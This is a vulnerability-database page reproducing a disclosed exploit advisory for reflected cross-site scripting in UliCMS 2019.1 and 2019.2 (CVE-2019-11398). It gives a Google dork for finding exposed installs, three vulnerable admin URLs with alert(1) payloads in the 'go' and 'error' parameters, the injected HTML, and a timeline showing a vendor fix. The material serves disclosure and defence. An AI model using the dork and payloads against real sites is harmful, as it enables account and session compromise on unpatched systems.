| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting Exploit | 22 Apr 201900:00 | – | zdt | |
| UliCMS 2019.1 Spitting Lama - Persistent Cross-Site Scripting Vulnerability | 10 Jun 201900:00 | – | zdt | |
| UliCMS XSS Injection Vulnerability | 23 Apr 201900:00 | – | cnvd | |
| CVE-2019-11398 | 8 May 201917:36 | – | cve | |
| CVE-2019-11398 | 8 May 201917:36 | – | cvelist | |
| UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting | 10 Jun 201900:00 | – | exploitdb | |
| EUVD-2019-3076 | 7 Oct 202500:30 | – | euvd | |
| UliCMS 2019.2 2019.1 - Multiple Cross-Site Scripting | 22 Apr 201900:00 | – | exploitpack | |
| UliCMS 2019.1 Spitting Lama - Persistent Cross-Site Scripting | 10 Jun 201900:00 | – | exploitpack | |
| CVE-2019-11398 | 8 May 201918:29 | – | nvd |
# Exploit Title: UliCMS - 2019.2 , 2019.1 - Multiple Cross-Site Scripting
# Google Dork: intext:"by UliCMS"
# Exploit Author: Kağan EĞLENCE
# Vendor Homepage: https://en.ulicms.de/
# Version: 2019.2 , 2019.1
# CVE : CVE-2019-11398
### Vulnerability 1
Url : http://localhost/ulicms/ulicms/admin/index.php?go=test%27%20accesskey=%27X%27%20onclick=%27alert(1)
Vulnerable File : /ulicms/admin/inc/loginform.php
Request Type: GET
Vulnerable Parameter : "go"
Payload: test%27%20accesskey=%27X%27%20onclick=%27alert(1)
Result : <input type="hidden" name="go" value='asd' accesskey='X'
onclick='alert(1)'>
### Vulnerability 2
Url : http://localhost/ulicms/ulicms/admin/index.php?register=register&go=test%27%20accesskey=%27X%27%20onclick=%27alert(1)
Vulnerable File : /ulicms/admin/inc/registerform.php
Request Type: GET
Vulnerable Parameter : "go"
Payload : register=register&go=asd%27%20accesskey=%27X%27%20onclick=%27alert(1)
Result : <input type="hidden" name="go" value='asd' accesskey='X'
onclick='alert(1)'>
### Vulnerability 3 - Authenticated
Url : http://localhost/ulicms/ulicms/admin/index.php?action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E
Request Type: GET
Vulnerable Parameter : "error"
Payload : action=favicon&error=%3Cscript%3Ealert(1)%3C/script%3E
### History
=============
2019-04-13 Issue discovered
2019-04-13 Vendor contacted
2019-04-13 Vendor response and hotfix
2019-04-14 Vendor releases fixed versions
2019-04-22 Advisory releaseData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation